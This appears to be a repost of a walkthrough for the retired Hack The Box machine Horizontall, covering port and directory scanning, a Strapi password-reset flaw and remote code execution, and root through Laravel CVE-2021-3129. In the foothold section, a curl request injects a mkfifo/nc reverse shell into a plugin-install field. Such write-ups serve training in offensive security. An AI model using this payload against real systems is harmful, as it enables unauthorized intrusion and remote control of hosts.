Horizontall: Hack The Box Walkthrough
source link: https://hackso.me/horizontall-htb-walkthrough/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
This post documents the complete walkthrough of Horizontall, a retired vulnerable VM created by wail99, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
On this post
Background
Horizontall is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
masscan -e tun0 -p1-65535,U:1-65535 10.10.11.105 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-30 04:26:35 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.11.105
Discovered open port 22/tcp on 10.10.11.105
Nothing unusual. Let’s do one better with nmap
scanning the discovered ports to establish their services.
nmap -n -v -Pn -p22,80 -A --reason 10.10.11.105 -oN nmap.txt
...
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
I’d better map horizontall.htb
to 10.10.11.105
in /etc/hosts
. This is what the site looks like.
I’m guessing HT refers to Horizontall.
Directory/File Enumeration
Let’s see what we can glean from gobuster
and SecLists for a start.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -e -t 20 -x php,htm,html,txt -u http://horizontall.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://horizontall.htb/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,txt,php,htm
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/08/30 06:24:57 Starting gobuster in directory enumeration mode
===============================================================
http://horizontall.htb/js (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]
http://horizontall.htb/css (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
http://horizontall.htb/img (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
http://horizontall.htb/index.html (Status: 200) [Size: 901]
===============================================================
2021/08/30 06:26:09 Finished
===============================================================
This is a shit-show. We need more information.
Burp Suite - Site Map
Suppose we reload the site through Burp Suite.
What do we have here? I’d better include api-prod.horizontall.htb
into the mix as well. A simple curl
reveals more.
I wonder what’s Strapi…
Strapi Framework Vulnerable to Remote Code Execution
In any case, let’s run ffuf
on api-prod.horizontall.htb
and see what we get.
ffuf -u http://api-prod.horizontall.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://api-prod.horizontall.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
Admin [Status: 200, Size: 854, Words: 98, Lines: 17]
ADMIN [Status: 200, Size: 854, Words: 98, Lines: 17]
admin [Status: 200, Size: 854, Words: 98, Lines: 17]
favicon.ico [Status: 200, Size: 1150, Words: 4, Lines: 1]
index.html [Status: 200, Size: 413, Words: 76, Lines: 20]
robots.txt [Status: 200, Size: 121, Words: 19, Lines: 4]
reviews [Status: 200, Size: 507, Words: 21, Lines: 1]
users [Status: 403, Size: 60, Words: 1, Lines: 1]
I had Burp Suite on the entire time and when I saw the following response when I browsed to http://api-prod.horizontall.htb/admin
, I knew I struck gold.
A quick Google search on “strapi rce” led me to this article. In short, Strapi 3.0.0-beta.17.7 or earlier is vulnerable to authenticated RCE and we have a 3.0.0-beta.17.4 on our hands.
Strapi Password Reset
Now, how can we get our hands on a password for remote code execution? Well, we don’t. There’s another vulnerability that allows us to reset a Strapi Administrator password without reset tokens. Armed with this insight all we need to reset the password is a POST request like so.
What’s really important is the JWT.
Foothold
Now that we have a valid JWT, getting foothold is easy.
curl -i \
-s \
-k \
-X $'POST' \
-H $'Authorization: Bearer [jwt]' \
-H $'Content-Type: application/json' \
-H $'Connection: close' \
--data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.17.134 1234 >/tmp/f)\",\"port\":\"1337\"}' \
$'http://api-prod.horizontall.htb/admin/plugins/install'
The file user.txt
is in developer
’s home directory.
Privilege Escalation
During enumeration of strapi
’s account, I notice port (8000/tcp
) listening on localhost
.
I can easily inject a SSH key I control into /opt/strapi/.ssh/authorized_keys
to 1) get a more stable shell, and 2) perform local port forwarding like so.
ssh -L 8000:127.0.0.1:8000 -i strapi [email protected]
Laravel
So, Lavarel is runnning at 8000/tcp
.
CVE-2021-3129 - Unauthenticated RCE in Ignition before 2.5.2 used in Laravel
We are looking at CVE-2021-3129. There are plenty of exploits for CVE-2021-3129 in GitHub and I’ve chosen the one that appears to be the most straightforward.
I have shell over at my attacking terminal, a root
shell no less.
Armed with a root
shell, it’s trivial to retrieve root.txt
.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK